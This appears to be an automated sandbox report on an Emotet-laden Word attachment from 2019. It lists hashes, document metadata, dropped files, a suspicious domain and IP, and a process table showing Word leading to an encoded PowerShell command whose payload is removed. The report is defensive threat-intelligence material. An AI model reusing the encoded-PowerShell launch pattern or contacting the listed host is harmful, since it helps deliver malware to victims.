Field | Value
---|---
File name | Anhang-90326575-37.doc
Full analysis | https://app.any.run/tasks/c494c164-7517-42d4-86b4-55fba2bc860b
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.
Analysis date | May 20, 2019, 11:33:03
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: synthesize ivory, Subject: Product, Author: Trycia Kris, Comments: drive Georgia, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 16 07:40:00 2019, Last Saved Time/Date: Thu May 16 07:40:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0
MD5 | D471A81D7869855E41717B65A9A388A4
SHA1 | D7BFEBF3826346410D2DA308344EA1C8060213D0
SHA256 | DD9076EAD2252FB957324F8DDED925F342FB7DA22D9519A902EF6B4F3DFC9FD4
SSDEEP | 3072:U77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q5v00onx8p1Dbz53:U77HUUUUUUUUUUUUUUUUUUUT52VOs0oi
Extension | Description
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Field | Value
---|---
CompObjUserTypeLen | 32
CompObjUserType | Microsoft Word 97-2003 Document
Title | synthesize ivory
Subject | Product
Author | Trycia Kris
Keywords | -
Comments | drive Georgia
Template | Normal.dotm
LastModifiedBy | -
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | -
CreateDate | 2019:05:16 06:40:00
ModifyDate | 2019:05:16 06:40:00
Pages | 1
Words | 29
Characters | 169
Security | None
CodePage | Windows Latin 1 (Western European)
Company | Rolfson and Sons
Lines | 1
Paragraphs | 1
CharCountWithSpaces | 197
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | -
HeadingPairs | 
Manager | Kemmer
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Anhang-90326575-37.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
3036 | PowErsHell -enC [base64 argument removed] | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | | wmiprvse.exe

PID 3336 details: User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Microsoft Word, Version: 14.0.6024.1000

PID 3036 details: User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Windows PowerShell, Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREEB2.tmp.cvr | — | — | —
3036 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6TNJMR6GKVI3ZNTSP5BB.temp | — | — | —
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A0379AD.wmf | wmf | 6EF44D62D9FE23364E914AA5BEFB0BDE | 2F6A779A416283E8A1687802FD139615B3C4536FE7530E5E47E8C4D361C6A88A
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84F6E543.wmf | wmf | 92454FD3EE4CC004AF1C2FDDAE32D8D6 | DE1112F0EA7E12423ED92EDA70C1651980753E6413E99E5FCCAB313D784DF6C2
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD22D349.wmf | wmf | 131A88B4443F82701D0C728E563E253A | AD46CF038CA46D91F91DC20FCEC875F9AF67C7986FF76EC8D20352695456A30B
3036 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3336 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 17222E7BED955763CB75EBDA153E0074 | EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\659BB39E.wmf | wmf | 30AABCA2BFE0107FA736FF4FB18D84DE | 8B6317E4B6B0195EDB88EE5CE6F8F59CF6863585B13B34494105CD28305B285B
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 81D51546923F042BCDD0F73B7F856358 | 9F328411669124B2DA29BD49203275C498982AE12EA7DAAB36D76DCCF4756220
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FA89634.wmf | wmf | 9E54587FC5613AAB2407E0865C1CCDD7 | 806A3C4E0412991580840BBF8F89825909042CDB92898612C138344E8E07EFFD
PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
3036 | PowErsHell.exe | 37.139.14.80:443 | annilopponen.com | Digital Ocean, Inc. | NL | unknown
Domain | IP | Reputation
---|---|---
annilopponen.com | | suspicious